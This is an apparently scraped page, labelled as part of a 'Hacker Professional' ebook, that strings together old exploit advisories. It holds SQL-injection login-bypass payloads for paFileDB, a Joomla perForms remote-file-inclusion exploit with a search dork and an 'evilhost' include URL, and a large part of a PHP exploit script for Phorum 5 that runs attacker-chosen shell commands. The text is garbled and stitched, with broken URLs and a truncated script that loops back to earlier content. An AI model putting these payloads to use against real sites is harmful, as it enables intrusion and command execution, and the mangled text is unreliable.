
Hacker Professional Ebook part 403 pdf


# greetz : www.cigicigi.net & redhackers Vulnerable; include/admin/auth.php c0de ; if (isset($_COOKIE['pafiledb_user']) && isset($_COOKIE['pafiledb_pass'])) { //If the cookie exists, do all this: $admininfo = array(); if (checkpass($_COOKIE['pafiledb_user'], $_COOKIE['pafiledb_pass'], $admininfo)) { //checkpass() returned true, so the user exists //$adminloggedin is a var used throughout the script to see if someone's logged in. $adminloggedin = true; $smarty->assign('admininfo', $admininfo[0]); } else { //The cookie exists, but the user/pass don't match username : 1%20union%20select%%20201,2,3,4/* password : 1%20union%20select%%20201,2,3,4/* / pafile/pafiledb.php?action=admin logged Black_hat_cr(HCE) perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion Jul perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion Remote : Yes Critical Level : High Vuln founded in a log file: lazy 0day!!! Description: ~~~~~~~~~~~~ Application : perForms Joomla Component Version : latest version [1.0] URL : http://forge.joomla.org/sf/projects/performs Variable $mosConfig_absolute_path not sanitized: xpl works with register_globals=on in /components/com_performs/com_performs/performs.php on lines 6-10 require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib _template.php" ); require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib _valid.php" ); require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib _phpForm.php" ); require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/myL ib.php" ); require_once($mosConfig_absolute_path."/administrator/components/com_per forms/class.performs.php"); Exploit: ~~~~~~~~ dork: inurl:"com_performs" -> founds ~12.000 sites (!) 
http://www.vuln.com/components/com_p osConfig_absol ute_path=http://evilhost
Fix ~~~~ Add at the top of performs.php, before the require_once lines: defined('_VALID_MOS') or die('Direct access to this location is not allowed.'); With this guard in place a direct request to the component file stops before the require_once lines run, so a request-supplied $mosConfig_absolute_path (possible with register_globals=on, as noted above) never reaches them.
Thx ~~~~ Who works for better code and better life! vns3curity(HCE)
PHORUM 5 arbitrary local inclusion
#!/usr/bin/php -q -d short_open_tag=on <? echo "PHORUM 5 arbitrary local inclusion exploit\n"; echo "by rgod rgod (at) autistici (dot) org [email concealed]\n"; echo "site: http://retrogod.altervista.org\n"; echo "dork: \"This forum powered by Phorum.\"\n\n"; /* works with: register_globals=On magic_quotes_gpc=Off */ if ($argc<6) { echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\n"; echo "host: target server (ip/hostname)\n"; echo "path: path to phorum\n"; echo "user/pass: you need a valid user account\n"; echo "cmd: a shell command\n"; echo "Options:\n"; echo " -p[port]: specify a port other than 80\n"; echo " -P[ip:port]: specify a proxy\n"; echo "Examples:\n"; echo "php ".$argv[0]." a.b.c.d /phorum/ username password ls -la\n"; echo "php ".$argv[0]." a.b.c.d / username password ls -la -P1.1.1.1:8080\n"; echo "php ".$argv[0]." 
a.b.c.d / username password cat ./include/db/config.php - p81\n"; die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) '; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy ';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy \r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy ';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } $host=$argv[1]; $path=$argv[2]; $user=$argv[3]; $pass=$argv[4]; $cmd=""; $port=80; $proxy=""; for ($i=5; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} echo "[1] Login \r\n"; $data="forum_id=0"; $data.="&redir=http%3A%2F%2F".$host."%2Findex.php" ; $data.="&username=".$user; $data.="&password=".$pass; $packet ="POST ".$p."login.php HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Accept: text/plain\r\n"; $packet.="Connection: Close\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Cookie: phorum_tmp_cookie=this+will+be+destroyed+once+logg . ';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy "; $ock=fsockopen($parts[0],$parts[1]); if. # greetz : www.cigicigi.net & redhackers Vulnerable; include/admin/auth.php c0de ; if (isset($_COOKIE['pafiledb_user'])

Ngày đăng: 04/07/2014, 12:20